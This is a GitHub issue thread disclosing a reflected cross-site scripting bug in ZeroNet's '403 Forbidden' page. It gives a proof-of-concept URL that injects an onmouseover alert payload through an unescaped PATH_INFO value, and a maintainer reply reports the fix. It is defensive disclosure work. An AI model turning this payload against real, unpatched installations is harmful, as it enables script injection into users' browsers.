### ISSUE TITLE
XSS - Cross Site Scripting on "403 Forbidden" page

### ISSUE THREAD

**Issue by krzotr** [HelloZeroNet/ZeroNet#1976]
Tested on latest git versions of `0.7.0` and `0.6.5`

1. Open Firefox and go to URL (does not work on Chrome - ERR_BLOCKED_BY_XSS_AUDITOR)
2. Move your mouse on the red rectangle - JavaScript code has been executed

```
http://127.0.0.1:43110/uimedia/im..g/aaa%3Cdiv%20oNmouseover=alert(1);%20style=width:500px;height:500px;background-color:red;position:absolute;top:50;left:50%3EXSS%3C/div%3Eaaa/
```
![xss](https://user-images.githubusercontent.com/655681/55917124-9f08aa00-5bee-11e9-8bdd-a2f43d811588.png)

In HTML code you can see:
```
    "HTTP_HOST": "127.0.0.1:43110",
    "HTTP_UPGRADE_INSECURE_REQUESTS": "1",
    "HTTP_USER_AGENT": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
    "PATH_INFO": "/uimedia/im..g/aaa<div oNmouseover=alert(1); style=width:500px;height:500px;background-color:red;position:absolute;top:50;left:50>XSS</div>aaa/",
    "QUERY_STRING": "",
    "REMOTE_ADDR": "172.17.0.1",
    "REMOTE_PORT": "40050",
```

Value of `PATH_INFO` is not escaped!.
Please escape the following characters with HTML entity encoding to prevent switching into any execution context (`&`, `<`, `>`, `"`, `'`)

**Comment by HelloZeroNet** [comment]
Thanks for reporting fixed in Rev3861/Rev4054
https://github.com/HelloZeroNet/ZeroNet/commit/c0d81021dfbb4324a9933455ca41e467cfa63b06
